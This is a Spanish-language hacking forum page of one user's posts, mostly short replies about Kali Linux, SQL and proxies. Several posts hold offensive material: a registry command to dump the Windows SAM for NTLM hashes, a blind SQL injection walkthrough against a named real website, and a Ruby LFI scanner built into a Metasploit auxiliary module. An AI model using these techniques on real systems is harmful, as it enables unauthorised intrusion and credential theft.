ARP flooding googlea, aunque para comprenderlo te sugiero que te adentres en el funcionamiento del protocolo ARP.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#82
Dudas y pedidos generales / Re:Personalizar
Abril 09, 2014, 11:01:11 PMCitarDespues te recomiendo que veas este fabuloso post que dejo ANTRAX sobre primeros pasos con Kali Linux, quien personaliza bastante al mismo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
?? Le agrega los repos de apt nomas y encima vienen por defecto
#83
Presentaciones y cumpleaños / Re:Hola soy fernando como estan?
Marzo 29, 2014, 04:56:14 PM
hola soy carlitox y vengo a flotar
#85
Bugs y Exploits / Re:Inyección SQLi Manual Metodo (POST)
Marzo 16, 2014, 06:31:02 PMCitarotra cosa el "0x3d" no significa nada más bien es un código que nos sirve para sacar la información
0x3d : signo igual (=) en hex separa el valor de cada columna, podrias usar cualquier caracter equivalente en hex como 0x3a : ( : ), etc
#86
Ingeniería Inversa / Re:[TUTORIAL]Averiguar la SMP de Windows.
Febrero 14, 2014, 11:27:31 PM
Hay que resaltar que no siempre se va a tener una sesion de meterpreter para tipear HASHDUMP y obtener los hashes NTLM, por esa misma razon tambien se pueden usar herramientas como pwdump, fgdump u obetenerlas desde el mismo editor de registros
Código: dos
reg save HKLM\SAM hashes.txt
#87
Hacking / Re:Como despistar al atacante que intenta robar mi contraseña
Febrero 11, 2014, 01:36:49 PM
Me parece una boludes, hay que ser muy pelotudo para no darte cuenta del espacio en blanco, aparte quien va a ser tan idiota de poner su contraseña real seguida de un espacio en blanco...¬¬
#88
Off Topic / Re:Echar un cable a Snowden
Enero 20, 2014, 10:07:05 PM
Vos crees que con ese enlace vas a evitar que valla a la carcel..??
SPAM DETECTED
SPAM DETECTED
#89
Dudas y pedidos generales / Re:Exploit Pack en kali linux
Enero 08, 2014, 10:56:13 PM
Descargar : No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Extraes los archivos
Código: bash
Instalas
Código: bash
Extraes los archivos
tar xvzf ExploitPack.tar.gz
Instalas
dpkg -i ExploitPack.deb
#90
Dudas y pedidos generales / Re:Espiar red y captar mensajes de whatsapp, descifrar files pcap
Diciembre 29, 2013, 06:58:59 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Para que me va a servir esta herramienta si solo voy a ver cifras códigos y no ce q cosas mas, quiero ver texto de conversación que se ha hablao y etc..
No vas a poder capturar conversaciones de whatsapp en texto claro ni desifrarlas, el protocolo va encriptado.
#91
Dudas y pedidos generales / Re:Como determinar que filtro utilizar para bypass WAF
Diciembre 26, 2013, 11:22:41 PM
Estuve realizando testeos y el waf esta muy bien configurado por lo que se me hizo imposible evadir las restricciones, salvo que la unica informacion que pude obtener fue el nombre de la db con la siguiente consulta, utilizando la tecnica mysql blind, ya que no requeria de ciertas sentencias que se encuentran en la blacklist del firewall.
Código: mysql ->b
Database: piebdomi_pieb
asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),1,1))=112# ->p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),2,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),3,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),4,1))=98# -> b
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),5,1))=100# -> d
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),6,1))=111# -> o
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),7,1))=109# -> m
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),8,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),9,1))=95# -> _
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),10,1))=112# -> p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),11,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),12,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),13,1))=98#
Database: piebdomi_pieb
asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc
#92
Seguridad web y en servidores / Re:Previniendo ataques XSS
Diciembre 26, 2013, 05:40:27 PM![](http://blog.buguroo.com/wp-content/uploads/2012/02/021312_2104_Previniendo2.png)
Tanto quilombo para filtrar un XSS en php??
htmlentities(param, ENT_QUOTES);
#93
Dudas y pedidos generales / Re:como puedo hacer esto en python
Diciembre 25, 2013, 01:58:45 AM
Proba con el modulo urllib2
#94
Dudas y pedidos generales / Re:ayuda con un buscador por letras [A-Z]
Diciembre 23, 2013, 11:44:29 PM
Si podes ser mas especifico poniendo la consulta que queres realizar y detallando un poco mas de informacion no va a ver problema en que te ayudemos
si quisieras seleccionar las columnas de una tabla que empiecen por determinada letra seria asi:
Código: mysql
Selecciona todas las palabras que empiezen por f, % es un comodin, indica cualquier caracter desp de f
si quisieras seleccionar las columnas de una tabla que empiecen por determinada letra seria asi:
SELECT columna FROM tabla WHERE columna LIKE 'f%';
Selecciona todas las palabras que empiezen por f, % es un comodin, indica cualquier caracter desp de f
#95
Hacking / Re:Recursos y aplicaciones de PENTEST
Diciembre 19, 2013, 05:46:02 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Kali Linux tiene hueco en este tema??
Es la nueva generación de BackTrack5 por así decirlo.
Saludos,
Kolibrí26
No, estas son distribuciones vulnerables para practicar en entornos controlados y son usadas como sistemas victima.
#96
Bugs y Exploits / Escribiendo un auxiliar para MSF
Diciembre 10, 2013, 04:10:05 PM![](http://q3rv0.com.ar/wp-content/uploads/2013/12/metasploit_windows_0.jpg)
La idea de comenzar a aprender ruby llego solo por el echo de poder ver en la consola del msf un auxiliar escrito por mi, la API de metasploit no es un muy complicadad de llevar y con solo unos dias de practica, y es mas, ya estando familiarizados con otros lenguajes similares como lo son python y perl la forma de tomar el control de ruby se hace mas llevadera que comenzar desde cero, por suspuesto no estoy diciendo que sean realmente identicos pero ambos lenguajes poseen ciertas caracteristicas como la sencilles de su sintaxis, entre otras.
Durante este tutorial se mostrara paso a paso como aderir nuestra herramienta escrita en ruby como modulo auxiliar de msf. Para ello programe un sencillo scanner de LFI.
#Autor: [Q]3rV[0]
require 'net/http'
require 'uri'
def conn(vector)
host=URI.parse(vector)
return Net::HTTP.get(host)
end
def compr(data, vector)
if data =~ /root:/
puts "Parametro vulnerable a LFI -> #{vector}\n"
else
puts "Not Found -> #{vector}\n"
end
end
def lfi(web, pb, file)
a=0
while a<pb
a=a+1
traversal="../"*a+file
vector=web+traversal
data=conn(vector)
compr(data, vector)
end
end
lfi(ARGV[0], ARGV[1].to_i, "etc/passwd")
lfi(ARGV[0], ARGV[1].to_i, "etc/passwd%00")
Se le debera pasar como argumentos el parametro vulnerable y un numero que indicara la cantidad de '../' que realizara la inyeccion.
![](http://q3rv0.com.ar/wp-content/uploads/2013/12/1.png)
Lo primero que haremos sera importar el modulo msf/core y crer una clase en la cual heredaremos los metodos de Msf::Auxiliary.
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
end
Luego crearemos el metodo initialize que contendra dos funciones: super() y register_options().
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
def initialize
super()
register_options()
end
end
super() contendra la informacion de nuestro auxiliar, tales como la version, el nombre del autor, la descripcion del modulo, etc.
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'LFI scanner',
'Version' => '1.0',
'Description' => 'Scanner para realizar inyecciones LFI',
'Author' => '[Q]3rV[0]',
'License'=> MSF_LICENSE
)
register_options()
end
end
Por otro lado register_options() contendra las opciones del auxiliar, y es donde definiremos los argumentos para luego setearlos desde msf.
La funcion tomara dos argumentos
register_options([],self.class)
Dentro del array definiremos las opciones teniendo tipos como:
OptInt.new() # Para valores enteros
OptString.new() # Para cadenas
OptAddress.new() # Para direcciones
En nuestro caso quedaria de la siguiente manera
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'LFI scanner',
'Version' => '1.0',
'Description' => 'Scanner para realizar inyecciones LFI',
'Author' => '[Q]3rV[0]',
'License'=> MSF_LICENSE
)
register_options([OptString.new('RHOST',[true, 'Indique el target']),
OptInt.new('TRAVERSAL',[true, 'Path traversal'])], self.class)
end
end
Fijense la sintaxis de Optxxx
OptString.new('RHOST',[true, 'Indique el target'])
Recibe dos argumentos, el primero indica el nombre del parametro, el segundo es un array que contiene como primer indice un valor boleano que indica si es prescindible definir esa variable, y el segundo indice contiene la descripcion de la opcion.
Bien, ahora pasemos a la parte donde hubicaremos el codigo del scanner.
Definiremos otro metodo llamado run() donde incluiremos el codigo.
require 'msf/core'
require 'net/http'
require 'uri'
class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'LFI scanner',
'Version' => '1.0',
'Description' => 'Scanner para realizar inyecciones LFI',
'Author' => '[Q]3rV[0]',
'License'=> MSF_LICENSE
)
register_options([OptString.new('RHOST',[true, 'Indique el target']),
OptInt.new('TRAVERSAL',[true, 'Path traversal'])], self.class)
end
def run()
def conn(vector)
host=URI.parse(vector)
return Net::HTTP.get(host)
end
def compr(data, vector)
if data =~ /root:/
puts "Parametro vulnerable a LFI -> #{vector}\n"
else
puts "Not Found -> #{vector}\n"
end
end
def lfi(web, pb, file)
a=0
while a<pb
a=a+1
traversal="../"*a+file
vector=web+traversal
data=conn(vector)
compr(data, vector)
end
end
lfi(ARGV[0], ARGV[1].to_i, "etc/passwd")
lfi(ARGV[0], ARGV[1].to_i, "etc/passwd%00")
end
end
Pero todavia falta el pasaje de los argumentos y eso lo haremos con datastore['PARAMETRO'], donde PARAMETRO seran los antes definidos con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta()
Quedando finalizado nuestro modulo auxiliar para Msf.
require 'msf/core'
require 'net/http'
require 'uri'
class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'LFI scanner',
'Version' => '1.0',
'Description' => 'Scanner para realizar inyecciones LFI',
'Author' => '[Q]3rV[0]',
'License'=> MSF_LICENSE
)
register_options([OptString.new('RHOST',[true, 'Indique el target']),
OptInt.new('TRAVERSAL',[true, 'Path traversal'])], self.class)
end
def run()
def conn(vector)
host=URI.parse(vector)
return Net::HTTP.get(host)
end
def compr(data, vector)
if data =~ /root:/
puts "Parametro vulnerable a LFI -> #{vector}\n"
else
puts "Not Found -> #{vector}\n"
end
end
def lfi(web, pb, file)
a=0
while a<pb
a=a+1
traversal="../"*a+file
vector=web+traversal
data=conn(vector)
compr(data, vector)
end
end
lfi(datastore['RHOST'], datastore['TRAVERSAL'], "etc/passwd")
lfi(datastore['RHOST'], datastore['TRAVERSAL'], "etc/passwd%00")
end
end
Para terminar agregaremos el auxiliar a msf, crearemos un direcotorio en /opt/metasploit/apps/pro/msf3/modules/auxiliary y copiaremos nuestro script dentro.
Luego accederemos a el.
![](http://q3rv0.com.ar/wp-content/uploads/2013/12/2.png)
![](http://q3rv0.com.ar/wp-content/uploads/2013/12/3.png)
#97
Dudas y pedidos generales / Re:Conexion Socks4/5 [AYUDA]
Diciembre 05, 2013, 10:26:43 PM
Proba con proxychains
#98
Off Topic / Re:¿De donde proviene tu nick?
Diciembre 02, 2013, 01:03:31 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cuervo, con esa aclaracion, le cambiaste la vida a todo el mundo! jajaja yo estuve meses para darme cuenta lo que significaba!
ANTRAX: Lo elegí en el 2001 cuando empece en el hacking. Que fue cunado Bin laden enviaba sobres con ANTRAX (que es un virus) por sobres. Y como cuando empece en el 2001, me gustaban los malwares, tomé ese nombre como nick
jajaja me acuerdo cuando empezaron con esa locura de los sobres en la argentina!
#100
Dudas y pedidos generales / Re:Aprendiendo con Curl
Noviembre 22, 2013, 05:07:55 PM
Lo mas probable es que el hosting donde tenes montado el script haya sido reportado como phishing.